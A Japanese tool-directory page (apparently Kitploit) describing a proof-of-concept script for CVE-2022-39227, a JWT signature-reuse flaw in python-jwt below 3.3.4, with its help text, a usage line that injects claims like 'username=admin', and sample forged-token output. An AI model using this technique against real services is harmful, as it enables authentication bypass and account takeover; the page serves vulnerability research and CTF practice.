Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-39227 — CVE-2022-39227 : 概念実証 | Kitploit
ツール/GitHubGitHub/user0x1337/cve-2022-39227
ペイロード生成脆弱性分析エクスプロイトウェブセキュリティCTF認証
GitHubuser0x1337/cve-2022-39227

CVE-2022-39227

CVE-2022-39227 : 概念実証

リポジトリを見る
22122年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-39227

CVE-2022-39227 : 概念実証

CVE-2022-39227 の概念実証です。このCVEによると、JSON Web Tokenの検証に欠陥があります。有効なトークンを使って、変更されたクレームでその署名を再利用することが可能です。

必要条件:

  1. 有効なJSON Web Token。
  2. バックエンドがバージョン3.3.4未満のPythonライブラリ「python-jwt」を使用していること。

使いやすくするために、CTF中に簡単なPoCを作成しました。

root@kitploit:~
usage: CVE-2022-39227-PoC [-h] -j TOKEN -i CLAIM

Proof of Concept for the JWT verification bug in python-jwt version < 3.3.4

options:
  -h, --help            show this help message and exit
  -j TOKEN, --jwt_token TOKEN
                        Original and valid JWT Token returned by the application
  -i CLAIM, --injected_claim CLAIM
                        Inject claim using the form "key=value", e.g. "username=admin". Use "," for more claims
                        (e.g. username=admin,id=3)

使用方法:

python3 cve_2022_39227.py -j <JWT-WEBTOKEN> -i "<KEY>=<VALUE>"

戻り値:

root@kitploit:~
{"  <SNIP>":"","protected":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"<SNIP>","signature":"18-caQyY-mnreIUb53kk5qI-axRoxSzQKyT033yOdUw"}

戻り値は、JSONとコンパクト表現の混合形式です。新しいJWT Webトークンとして、「{」と「}」を含む全体の値を貼り付ける必要があります。

ツールをダウンロード